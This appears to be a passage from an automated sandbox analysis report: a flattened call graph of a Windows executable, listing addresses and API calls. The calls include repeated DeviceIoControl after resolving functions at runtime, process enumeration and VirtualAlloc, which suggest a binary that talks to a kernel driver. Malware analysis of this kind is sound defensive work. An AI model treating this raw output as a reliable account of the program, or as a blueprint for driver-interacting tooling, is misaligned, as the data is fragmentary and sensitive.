6142->6148 6145 7ff7cc418a94 6143->6145 6145->5683 6145->5684 6147 7ff7cc41a0a0 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6147->6141 6149 7ff7cc41c802 6148->6149 6150 7ff7cc41c877 ??1_Lockit@std@@QEAA 6149->6150 6152 7ff7cc41c819 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 6149->6152 6153 7ff7cc41c825 6149->6153 6151 7ff7cc423fc0 8 API calls 6150->6151 6154 7ff7cc41a08a ?always_noconv@codecvt_base@std@ 6151->6154 6152->6153 6153->6150 6155 7ff7cc41c83c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 6153->6155 6154->6141 6154->6147 6156 7ff7cc41c8a7 6155->6156 6157 7ff7cc41c850 6155->6157 6165 7ff7cc411280 6156->6165 6162 7ff7cc423868 6157->6162 6161 7ff7cc41c8ac 6163 7ff7cc424108 std::_Facet_Register 3 API calls 6162->6163 6164 7ff7cc41c862 6163->6164 6164->6150 6168 7ff7cc411250 6165->6168 6167 7ff7cc41128e _CxxThrowException __std_exception_copy 6167->6161 6168->6167 6170 7ff7cc419ed3 6169->6170 6171 7ff7cc419e23 6169->6171 6172 7ff7cc423fc0 8 API calls 6170->6172 6171->6170 6173 7ff7cc419e2d 6171->6173 6174 7ff7cc419ee2 6172->6174 6175 7ff7cc419e46 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 6173->6175 6176 7ff7cc419e71 6173->6176 6174->5690 6177 7ff7cc419e6c 6175->6177 6178 7ff7cc423fc0 8 API calls 6176->6178 6177->6176 6180 7ff7cc419ea7 fwrite 6177->6180 6179 7ff7cc419e8e 6178->6179 6179->5690 6180->6176 6182 7ff7cc41d2c7 6181->6182 6183 7ff7cc41d35e memmove memmove 6181->6183 6184 7ff7cc41d3a6 6182->6184 6186 7ff7cc41d349 6182->6186 6187 7ff7cc41d327 6182->6187 6183->5700 6185 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 6184->6185 6190 7ff7cc41d3ab 6185->6190 6189 7ff7cc41d334 6186->6189 6192 7ff7cc424108 std::_Facet_Register 3 API calls 6186->6192 6188 7ff7cc424108 std::_Facet_Register 3 API calls 6187->6188 6191 7ff7cc41d32f 6188->6191 6189->6183 6191->6189 6193 7ff7cc41d342 _invalid_parameter_noinfo_noreturn 6191->6193 6192->6189 6193->6186 6198 7ff7cc41cb52 6197->6198 6199 7ff7cc41cbc7 ??1_Lockit@std@@QEAA 6198->6199 6201 7ff7cc41cb69 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 6198->6201 6202 7ff7cc41cb75 6198->6202 6200 7ff7cc423fc0 8 API calls 6199->6200 6203 7ff7cc41cbe2 6200->6203 6201->6202 6202->6199 6204 7ff7cc41cb8c ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 6202->6204 6203->5777 6205 7ff7cc41cbf7 6204->6205 6206 7ff7cc41cba0 6204->6206 6207 7ff7cc411280 Concurrency::cancel_current_task 2 API calls 6205->6207 6208 7ff7cc423868 std::_Facet_Register 3 API calls 6206->6208 6209 7ff7cc41cbfc 6207->6209 6210 7ff7cc41cbb2 6208->6210 6210->6199 6212 7ff7cc415eba 6211->6212 6213 7ff7cc415e36 6211->6213 6215 7ff7cc423fc0 8 API calls 6212->6215 6213->6212 6214 7ff7cc415e40 DeviceIoControl 6213->6214 6214->6212 6214->6213 6216 7ff7cc415ec9 6215->6216 6216->5793 6216->5797 6222 7ff7cc417c80 6217->6222 6218 7ff7cc417ca3 6220 7ff7cc423fc0 8 API calls 6218->6220 6219 7ff7cc417cd0 DeviceIoControl 6221 7ff7cc417e6d 6219->6221 6219->6222 6223 7ff7cc417300 6220->6223 6224 7ff7cc41a3c0 9 API calls 6221->6224 6222->6218 6222->6219 6230 7ff7cc417d58 6222->6230 6223->5801 6225 7ff7cc417e80 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6224->6225 6225->6218 6226 7ff7cc417dd8 6226->6218 6228 7ff7cc41a3c0 9 API calls 6226->6228 6227 7ff7cc417da0 memcmp 6227->6230 6229 7ff7cc417deb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6228->6229 6229->6218 6230->6226 6230->6227 6230->6230 6232 7ff7cc416dd1 DeviceIoControl 6231->6232 6233 7ff7cc416e4f 6232->6233 6234 7ff7cc416e3f 6232->6234 6235 7ff7cc423fc0 8 API calls 6233->6235 6234->6232 6234->6233 6236 7ff7cc416e6b 6235->6236 6236->5827 6238 7ff7cc416ea2 6237->6238 6239 7ff7cc416f96 6237->6239 6240 7ff7cc416f69 6238->6240 6243 7ff7cc424090 3 API calls 6238->6243 6239->5831 6241 7ff7cc416f9e 6240->6241 6242 7ff7cc416f73 6240->6242 6360 7ff7cc41bf40 6241->6360 6244 7ff7cc41a3c0 9 API calls 6242->6244 6245 7ff7cc416ece 6243->6245 6247 7ff7cc416f86 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6244->6247 6245->6240 6248 7ff7cc41c9f0 7 API calls 6245->6248 6247->6239 6249 7ff7cc416f03 6248->6249 6333 7ff7cc416440 6249->6333 6252 7ff7cc416f5c 6359 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6252->6359 6254 7ff7cc416f57 6256 7ff7cc423fe0 free 6254->6256 6255 7ff7cc416f50 _invalid_parameter_noinfo_noreturn 6255->6254 6256->6252 6258 7ff7cc417132 6257->6258 6259 7ff7cc417275 6258->6259 6260 7ff7cc41722f 6258->6260 6265 7ff7cc424090 3 API calls 6258->6265 6261 7ff7cc423fc0 8 API calls 6259->6261 6263 7ff7cc417239 6260->6263 6264 7ff7cc41725e 6260->6264 6262 7ff7cc417296 6261->6262 6262->5838 6266 7ff7cc41a3c0 9 API calls 6263->6266 6383 7ff7cc41c580 6264->6383 6267 7ff7cc417182 6265->6267 6269 7ff7cc41724c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6266->6269 6267->6260 6270 7ff7cc41c9f0 7 API calls 6267->6270 6269->6259 6271 7ff7cc4171b7 6270->6271 6272 7ff7cc416440 27 API calls 6271->6272 6273 7ff7cc4171c9 6272->6273 6274 7ff7cc417210 6273->6274 6275 7ff7cc41720b 6273->6275 6277 7ff7cc417204 _invalid_parameter_noinfo_noreturn 6273->6277 6382 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6274->6382 6278 7ff7cc423fe0 free 6275->6278 6277->6275 6278->6274 6280 7ff7cc4240a6 6279->6280 6281 7ff7cc4240ab ReleaseSRWLockExclusive 6280->6281 6283 7ff7cc4240b0 SleepConditionVariableSRW 6280->6283 6283->6280 6285 7ff7cc41c3de 6284->6285 6286 7ff7cc41c3a4 6284->6286 6288 7ff7cc423fc0 8 API calls 6285->6288 6286->6285 6287 7ff7cc41c3a9 GetModuleHandleA 6286->6287 6289 7ff7cc41c407 GetProcAddress 6287->6289 6290 7ff7cc41c3bb 6287->6290 6291 7ff7cc41c3ec 6288->6291 6289->6290 6292 7ff7cc41c428 6289->6292 6294 7ff7cc41a3c0 9 API calls 6290->6294 6291->5863 6293 7ff7cc41c440 DeviceIoControl 6292->6293 6296 7ff7cc41c4bc 6292->6296 6293->6285 6293->6292 6295 7ff7cc41c3ce ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6294->6295 6295->6285 6297 7ff7cc415ef0 9 API calls 6296->6297 6298 7ff7cc41c4d0 6297->6298 6298->5863 6298->6285 6299 7ff7cc41c528 DeviceIoControl 6298->6299 6299->6285 6299->6298 6301 7ff7cc416fd2 6300->6301 6302 7ff7cc4170c6 6300->6302 6303 7ff7cc417099 6301->6303 6306 7ff7cc424090 3 API calls 6301->6306 6302->5879 6304 7ff7cc4170ce 6303->6304 6305 7ff7cc4170a3 6303->6305 6310 7ff7cc41c18f GetModuleHandleA 6304->6310 6311 7ff7cc41c1c4 6304->6311 6307 7ff7cc41a3c0 9 API calls 6305->6307 6309 7ff7cc416ffe 6306->6309 6308 7ff7cc4170b6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6307->6308 6308->6302 6309->6303 6312 7ff7cc41c9f0 7 API calls 6309->6312 6313 7ff7cc41c1ee GetProcAddress 6310->6313 6314 7ff7cc41c1a1 6310->6314 6317 7ff7cc423fc0 8 API calls 6311->6317 6316 7ff7cc417033 6312->6316 6313->6314 6315 7ff7cc41c20f 6313->6315 6320 7ff7cc41a3c0 9 API calls 6314->6320 6318 7ff7cc41c230 DeviceIoControl 6315->6318 6324 7ff7cc41c2a8 6315->6324 6319 7ff7cc416440 27 API calls 6316->6319 6321 7ff7cc41c1d2 6317->6321 6318->6311 6318->6315 6322 7ff7cc417045 6319->6322 6323 7ff7cc41c1b4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6320->6323 6321->5879 6325 7ff7cc41708c 6322->6325 6327 7ff7cc417087 6322->6327 6330 7ff7cc417080 _invalid_parameter_noinfo_noreturn 6322->6330 6323->6311 6326 7ff7cc415ef0 9 API calls 6324->6326 6399 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6325->6399 6329 7ff7cc41c2be 6326->6329 6331 7ff7cc423fe0 free 6327->6331 6329->6311 6332 7ff7cc41c2e0 DeviceIoControl 6329->6332 6330->6327 6331->6325 6332->6311 6332->6329 6334 7ff7cc41647a memset 6333->6334 6347 7ff7cc416634 6333->6347 6335 7ff7cc4164b0 DeviceIoControl 6334->6335 6337 7ff7cc41651e 6335->6337 6335->6347 6336 7ff7cc423fc0 8 API calls 6338 7ff7cc416757 6336->6338 6337->6335 6340 7ff7cc41652d 6337->6340 6338->6252 6338->6254 6338->6255 6339 7ff7cc416550 DeviceIoControl 6339->6340 6339->6347 6340->6339 6341 7ff7cc4165cc 6340->6341 6340->6347 6342 7ff7cc4165e3 VirtualAlloc 6341->6342 6341->6347 6343 7ff7cc415e00 9 API calls 6342->6343 6344 7ff7cc41661f 6343->6344 6345 7ff7cc416623 VirtualFree 6344->6345 6351 7ff7cc41663b 6344->6351 6345->6347 6346 7ff7cc41672d VirtualFree 6346->6347 6347->6336 6348 7ff7cc41c9f0 7 API calls 6348->6351 6349 7ff7cc4166c3 _stricmp 6350 7ff7cc416769 6349->6350 6349->6351 6352 7ff7cc4167ec VirtualFree 6350->6352 6355 7ff7cc41679f VirtualFree 6350->6355 6357 7ff7cc4167b0 6350->6357 6351->6346 6351->6348 6351->6349 6353 7ff7cc4167e5 _invalid_parameter_noinfo_noreturn 6351->6353 6354 7ff7cc423fe0 free 6351->6354 6352->6357 6353->6352 6354->6351 6355->6357 6356 7ff7cc4167ff 6358 7ff7cc423fe0 free 6356->6358 6357->6347 6357->6353 6357->6356 6358->6347 6361 7ff7cc41bf80 6360->6361 6375 7ff7cc41bfba 6360->6375 6362 7ff7cc41bf85 GetModuleHandleA 6361->6362 6361->6375 6364 7ff7cc41bf97 6362->6364 6365 7ff7cc41bfe3 GetProcAddress 6362->6365 6363 7ff7cc423fc0 8 API calls 6366 7ff7cc41bfc8 6363->6366 6368 7ff7cc41a3c0 9 API calls 6364->6368 6365->6364 6367 7ff7cc41c004 6365->6367 6366->6239 6369 7ff7cc41c020 DeviceIoControl 6367->6369 6371 7ff7cc41c098 6367->6371 6370 7ff7cc41bfaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6368->6370 6369->6367 6369->6375 6370->6375 6376 7ff7cc415ef0 6371->6376 6373 7ff7cc41c0ae 6374 7ff7cc41c0d2 DeviceIoControl 6373->6374 6373->6375 6374->6373 6374->6375 6375->6363 6379 7ff7cc415f26 6376->6379 6380 7ff7cc415fa6 6376->6380 6377 7ff7cc415f30 DeviceIoControl 6377->6379 6377->6380 6378 7ff7cc423fc0 8 API calls 6381 7ff7cc415fb5 6378->6381 6379->6377 6379->6380 6380->6378 6381->6373 6384 7ff7cc41c5fe 6383->6384 6385 7ff7cc41c5c4 6383->6385 6389 7ff7cc423fc0 8 API calls 6384->6389 6385->6384 6386 7ff7cc41c5c9 GetModuleHandleA 6385->6386 6387 7ff7cc41c627 GetProcAddress 6386->6387 6388 7ff7cc41c5db 6386->6388 6387->6388 6391 7ff7cc41c648 6387->6391 6392 7ff7cc41a3c0 9 API calls 6388->6392 6390 7ff7cc41c60c 6389->6390 6390->6259 6393 7ff7cc41c660 DeviceIoControl 6391->6393 6395 7ff7cc41c6dc 6391->6395 6394 7ff7cc41c5ee ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6392->6394 6393->6384 6393->6391 6394->6384 6396 7ff7cc415ef0 9 API calls 6395->6396 6397 7ff7cc41c6f0 6396->6397 6397->6384 6398 7ff7cc41c720 DeviceIoControl 6397->6398 6398->6384 6398->6397 6401 7ff7cc416428 6400->6401 6402 7ff7cc416332 6400->6402 6401->5978 6403 7ff7cc4163f9 6402->6403 6406 7ff7cc424090 3 API calls 6402->6406 6404 7ff7cc416430 6403->6404 6405 7ff7cc416405 6403->6405 6410 7ff7cc41aa68 GetModuleHandleA 6404->6410 6411 7ff7cc41aa9d 6404->6411 6407 7ff7cc41a3c0 9 API calls 6405->6407 6408 7ff7cc41635e 6406->6408 6409 7ff7cc416418 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6407->6409 6408->6403 6412 7ff7cc41c9f0 7 API calls 6408->6412 6409->6401 6413 7ff7cc41aac7 GetProcAddress 6410->6413 6414 7ff7cc41aa7a 6410->6414 6417 7ff7cc423fc0 8 API calls 6411->6417 6416 7ff7cc416393 6412->6416 6413->6414 6415 7ff7cc41aae8 6413->6415 6420 7ff7cc41a3c0 9 API calls 6414->6420 6418 7ff7cc41ab00 DeviceIoControl 6415->6418 6424 7ff7cc41ab78 6415->6424 6419 7ff7cc416440 27 API calls 6416->6419 6421 7ff7cc41aaab 6417->6421 6418->6411 6418->6415 6422 7ff7cc4163a5 6419->6422 6423 7ff7cc41aa8d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6420->6423 6421->5978 6425 7ff7cc4163ec 6422->6425 6427 7ff7cc4163e7 6422->6427 6430 7ff7cc4163e0 _invalid_parameter_noinfo_noreturn 6422->6430 6423->6411 6426 7ff7cc415ef0 9 API calls 6424->6426 6433 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6425->6433 6429 7ff7cc41ab8e 6426->6429 6431 7ff7cc423fe0 free 6427->6431 6429->6411 6432 7ff7cc41abb0 DeviceIoControl 6429->6432 6430->6427 6431->6425 6432->6411 6432->6429 6435 7ff7cc4159d0 DeviceIoControl 6434->6435 6436 7ff7cc415a3d 6435->6436 6437 7ff7cc415a4d 6435->6437 6436->6435 6436->6437 6438 7ff7cc423fc0 8 API calls 6437->6438 6439 7ff7cc415a63 6438->6439 6439->6078 6441 7ff7cc41aa68 GetModuleHandleA 6440->6441 6454 7ff7cc41aa9d 6440->6454 6442 7ff7cc41aac7 GetProcAddress 6441->6442 6443 7ff7cc41aa7a 6441->6443 6442->6443 6448 7ff7cc41aae8 6442->6448 6446 7ff7cc41a3c0 9 API calls 6443->6446 6444 7ff7cc423fc0 8 API calls 6447 7ff7cc41aaab 6444->6447 6445 7ff7cc41ab00 DeviceIoControl 6445->6448 6445->6454 6449 7ff7cc41aa8d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6446->6449 6447->6111 6448->6445 6450 7ff7cc41ab78 6448->6450 6449->6454 6451 7ff7cc415ef0 9 API calls 6450->6451 6453 7ff7cc41ab8e 6451->6453 6452 7ff7cc41abb0 DeviceIoControl 6452->6453 6452->6454 6453->6452 6453->6454 6454->6444 6456 7ff7cc421507 memset Process32FirstW 6455->6456 6463 7ff7cc42154b 6455->6463 6459 7ff7cc421533 6456->6459 6456->6463 6457 7ff7cc421557 CloseHandle 6458 7ff7cc421560 6457->6458 6460 7ff7cc423fc0 8 API calls 6458->6460 6461 7ff7cc421539 Process32NextW 6459->6461 6459->6463 6462 7ff7cc421572 6460->6462 6461->6459 6461->6463 6462->5328 6462->5329 6463->6457 6463->6458 6465 7ff7cc4245fa RtlLookupFunctionEntry 6464->6465 6466 7ff7cc424417 6465->6466 6467 7ff7cc424610 RtlVirtualUnwind 6465->6467 6468 7ff7cc4243b8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6466->6468 6467->6465 6467->6466 6472 7ff7cc424afc 6469->6472 6471 7ff7cc424b2a _CxxThrowException 6472->6471 6477 7ff7cc423518 6473->6477 6474 7ff7cc423526 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6474->6477 6475 7ff7cc423551 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6475->6477 6476 7ff7cc4235b5 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6481 7ff7cc423575 6476->6481 6477->6474 6477->6475 6478 7ff7cc4235de ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6477->6478 6480 7ff7cc423601 ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6477->6480 6477->6481 6478->6477 6479 7ff7cc423647 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6479->6481 6480->6477 6481->6476 6481->6479 6482 7ff7cc423253 6481->6482 6483 7ff7cc42368e ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6481->6483 6485 7ff7cc4236ce ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6481->6485 6490 7ff7cc4236f0 6481->6490 6482->5402 6483->6481 6485->6481 6487 7ff7cc411e76 6486->6487 6488 7ff7cc411eb3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6487->6488 6489 7ff7cc419ef0 12 API calls 6487->6489 6489->6488 6491 7ff7cc423728 6490->6491 6492 7ff7cc423853 6490->6492 6493 7ff7cc42374e 6491->6493 6497 7ff7cc42379a 6491->6497 6510 7ff7cc41d3b0 ?_Xlength_error@std@@YAXPEBD 6492->6510 6495 7ff7cc424108 std::_Facet_Register 3 API calls 6493->6495 6496 7ff7cc423858 6493->6496 6499 7ff7cc42375d 6495->6499 6498 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 6496->6498 6497->6499 6500 7ff7cc424108 std::_Facet_Register 3 API calls 6497->6500 6501 7ff7cc42385e ??1_Lockit@std@@QEAA 6498->6501 6502 7ff7cc4237c8 6499->6502 6503 7ff7cc4237cd memmove 6499->6503 6504 7ff7cc42384c _invalid_parameter_noinfo_noreturn 6499->6504 6500->6499 6505 7ff7cc4237e6 memmove 6502->6505 6503->6505 6504->6492 6506 7ff7cc423820 6505->6506 6507 7ff7cc4237f3 6505->6507 6506->6481 6507->6504 6508 7ff7cc423818 6507->6508 6509 7ff7cc423fe0 free 6508->6509 6509->6506 7154 7ff7cc419ad0 7153->7154 7154->7154 7155 7ff7cc41c9f0 7 API calls 7154->7155 7156 7ff7cc419ade 7155->7156 7157 7ff7cc420b10 7156->7157 7166 7ff7cc4202a0 7157->7166 7159 7ff7cc420b38 7159->7159 7184 7ff7cc420c40 7159->7184 7162 7ff7cc420c18 _CxxThrowException 7162->5551 7162->5552 7163 7ff7cc420c13 7165 7ff7cc423fe0 free 7163->7165 7164 7ff7cc420c0c _invalid_parameter_noinfo_noreturn 7164->7163 7165->7162 7167 7ff7cc419af0 22 API calls 7166->7167 7168 7ff7cc4202e0 7167->7168 7169 7ff7cc42030a 7168->7169 7170 7ff7cc41a0f0 11 API calls 7168->7170 7225 7ff7cc422230 7169->7225 7170->7169 7172 7ff7cc420336 7173 7ff7cc420377 __std_exception_copy 7172->7173 7174 7ff7cc420372 7172->7174 7177 7ff7cc42036b _invalid_parameter_noinfo_noreturn 7172->7177 7175 7ff7cc420439 7173->7175 7176 7ff7cc420404 7173->7176 7178 7ff7cc423fe0 free 7174->7178 7180 7ff7cc423fc0 8 API calls 7175->7180 7179 7ff7cc420434 7176->7179 7181 7ff7cc42042d _invalid_parameter_noinfo_noreturn 7176->7181 7177->7174 7178->7173 7182 7ff7cc423fe0 free 7179->7182 7183 7ff7cc42045a 7180->7183 7181->7179 7182->7175 7183->7159 7185 7ff7cc423948 __std_fs_code_page 2 API calls 7184->7185 7186 7ff7cc420ca4 7185->7186 7232 7ff7cc422430 7186->7232 7189 7ff7cc422430 28 API calls 7190 7ff7cc420d0c 7189->7190 7191 7ff7cc420d50 7190->7191 7194 7ff7cc420d42 7190->7194 7195 7ff7cc420d56 7190->7195 7270 7ff7cc422590 7191->7270 7193 7ff7cc420dbb 7196 7ff7cc422590 11 API calls 7193->7196 7250 7ff7cc422620 7194->7250 7195->7191 7199 7ff7cc420d62 memmove 7195->7199 7198 7ff7cc420dda 7196->7198 7200 7ff7cc422230 11 API calls 7198->7200 7201 7ff7cc420d9d 7199->7201 7202 7ff7cc420d84 7199->7202 7203 7ff7cc420de6 7200->7203 7205 7ff7cc423fe0 free 7201->7205 7202->7201 7204 7ff7cc420e5f _invalid_parameter_noinfo_noreturn 7202->7204 7206 7ff7cc420e76 7203->7206 7208 7ff7cc422590 11 API calls 7203->7208 7207 7ff7cc420e66 7204->7207 7205->7191 7215 7ff7cc420e83 7206->7215 7276 7ff7cc41cc00 7206->7276 7209 7ff7cc41cea0 10 API calls 7207->7209 7211 7ff7cc420e0c 7208->7211 7209->7206 7211->7207 7212 7ff7cc420e31 memmove 7211->7212 7212->7206 7213 7ff7cc420ee9 7217 7ff7cc420f37 7213->7217 7221 7ff7cc420f32 7213->7221 7224 7ff7cc420f2b _invalid_parameter_noinfo_noreturn 7213->7224 7215->7213 7216 7ff7cc420ee4 7215->7216 7219 7ff7cc420edd _invalid_parameter_noinfo_noreturn 7215->7219 7220 7ff7cc423fe0 free 7216->7220 7218 7ff7cc423fc0 8 API calls 7217->7218 7223 7ff7cc420bd2 7218->7223 7219->7216 7220->7213 7222 7ff7cc423fe0 free 7221->7222 7222->7217 7223->7162 7223->7163 7223->7164 7224->7221 7226 7ff7cc42224d 7225->7226 7227 7ff7cc4222a8 7226->7227 7228 7ff7cc422263 memmove 7226->7228 7230 7ff7cc41cea0 10 API calls 7227->7230 7228->7172 7231 7ff7cc4222bb 7230->7231 7231->7172 7233 7ff7cc420cd9 7232->7233 7234 7ff7cc422480 7232->7234 7233->7189 7249 7ff7cc422571 7234->7249 7296 7ff7cc423a94 WideCharToMultiByte 7234->7296 7236 7ff7cc4205b0 13 API calls 7238 7ff7cc422577 7236->7238 7239 7ff7cc420880 12 API calls 7238->7239 7240 7ff7cc422583 7239->7240 7241 7ff7cc4224ec memset 7245 7ff7cc4224c0 7241->7245 7242 7ff7cc422513 7243 7ff7cc422770 10 API calls 7242->7243 7243->7245 7246 7ff7cc423a94 4 API calls 7245->7246 7247 7ff7cc422540 7246->7247 7247->7233 7248 7ff7cc420880 12 API calls 7247->7248 7248->7249 7249->7236 7251 7ff7cc422649 7250->7251 7252 7ff7cc42275c 7250->7252 7254 7ff7cc4226a4 7251->7254 7256 7ff7cc422697 7251->7256 7257 7ff7cc4226cc 7251->7257 7302 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 7252->7302 7258 7ff7cc424108 std::_Facet_Register 3 API calls 7254->7258 7255 7ff7cc422761 7260 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7255->7260 7256->7254 7256->7255 7259 7ff7cc4226b9 7257->7259 7262 7ff7cc424108 std::_Facet_Register 3 API calls 7257->7262 7258->7259 7261 7ff7cc42272f _invalid_parameter_noinfo_noreturn 7259->7261 7264 7ff7cc422736 memmove 7259->7264 7265 7ff7cc4226f5 memmove 7259->7265 7263 7ff7cc422767 7260->7263 7261->7264 7262->7259 7266 7ff7cc42272d 7264->7266 7267 7ff7cc42270d 7265->7267 7268 7ff7cc422722 7265->7268 7266->7191 7267->7261 7267->7268 7269 7ff7cc423fe0 free 7268->7269 7269->7266 7271 7ff7cc4225f7 7270->7271 7272 7ff7cc4225b5 memmove 7270->7272 7273 7ff7cc41cea0 10 API calls 7271->7273 7272->7193 7275 7ff7cc42260c 7273->7275 7275->7193 7277 7ff7cc41cd54 7276->7277 7279 7ff7cc41cc2f 7276->7279 7303 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 7277->7303 7280 7ff7cc41cc8a 7279->7280 7282 7ff7cc41cc7d 7279->7282 7283 7ff7cc41ccb2 7279->7283 7284 7ff7cc424108 std::_Facet_Register 3 API calls 7280->7284 7281 7ff7cc41cd59 7286 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7281->7286 7282->7280 7282->7281 7285 7ff7cc41cc9f 7283->7285 7288 7ff7cc424108 std::_Facet_Register 3 API calls 7283->7288 7284->7285 7287 7ff7cc41cd1d _invalid_parameter_noinfo_noreturn 7285->7287 7290 7ff7cc41ccda memmove 7285->7290 7291 7ff7cc41cd24 memmove 7285->7291 7289 7ff7cc41cd5f 7286->7289 7287->7291 7288->7285 7293 7ff7cc41ccfb 7290->7293 7294 7ff7cc41cd10 7290->7294 7292 7ff7cc41cd1b 7291->7292 7292->7215 7293->7287 7293->7294 7295 7ff7cc423fe0 free 7294->7295 7295->7292 7297 7ff7cc423aeb GetLastError 7296->7297 7298 7ff7cc423af3 7296->7298 7297->7298 7299 7ff7cc423b00 WideCharToMultiByte 7298->7299 7300 7ff7cc4224a5 7298->7300 7299->7300 7301 7ff7cc423b2e GetLastError 7299->7301 7300->7238 7300->7241 7300->7242 7300->7245 7301->7300 7304 7ff7cc425c38 7306 7ff7cc425c40 7304->7306 7305 7ff7cc425c8d 7306->7305 7307 7ff7cc423fe0 free 7306->7307 7307->7306 7640 7ff7cc424fb8 7641 7ff7cc424ff0 __GSHandlerCheckCommon 7640->7641 7642 7ff7cc42501c 7641->7642 7643 7ff7cc42500b __CxxFrameHandler4 7641->7643 7643->7642 7719 7ff7cc425038 7720 7ff7cc42507a __GSHandlerCheckCommon 7719->7720 7721 7ff7cc4250a2 7720->7721 7722 7ff7cc425091 __C_specific_handler 7720->7722 7722->7721 7329 7ff7cc418ec0 7330 7ff7cc418ed9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 7329->7330 7331 7ff7cc418ee8 7329->7331 7330->7331 7332 7ff7cc418f69 7331->7332 7333 7ff7cc418f49 7331->7333 7334 7ff7cc418f1c memmove 7331->7334 7333->7332 7335 7ff7cc418f55 fwrite 7333->7335 7334->7332 7334->7333 7335->7332 7644 7ff7cc4199c0 7645 7ff7cc419a3a 7644->7645 7646 7ff7cc4199ce 7644->7646 7647 7ff7cc419a21 7646->7647 7648 7ff7cc4199ea memmove 7646->7648 7650 7ff7cc41cd60 7 API calls 7647->7650 7651 7ff7cc419a2c 7650->7651 7808 7ff7cc4206c0 ?_Syserror_map@std@@YAPEBDH 7809 7ff7cc4206f0 7808->7809 7809->7809 7810 7ff7cc41c9f0 7 API calls 7809->7810 7811 7ff7cc420705 7810->7811 7812 7ff7cc4198c0 7813 7ff7cc419904 7812->7813 7814 7ff7cc4198d3 7812->7814 7815 7ff7cc4198fc 7814->7815 7816 7ff7cc41991b _invalid_parameter_noinfo_noreturn 7814->7816 7817 7ff7cc423fe0 free 7815->7817 7817->7813 7818 7ff7cc4244c0 7821 7ff7cc4244d4 IsProcessorFeaturePresent 7818->7821 7822 7ff7cc4244eb 7821->7822 7827 7ff7cc424570 RtlCaptureContext RtlLookupFunctionEntry 7822->7827 7828 7ff7cc4245a0 RtlVirtualUnwind 7827->7828 7829 7ff7cc4244ff 7827->7829 7828->7829 7830 7ff7cc4243b8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7829->7830 7571 7ff7cc411140 __std_exception_destroy

                                                                                          Executed Functions

                                                                                          Function 00007FF7CC4145E0 Relevance: 112.6, APIs: 36, Strings: 28, Instructions: 601libraryfilethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
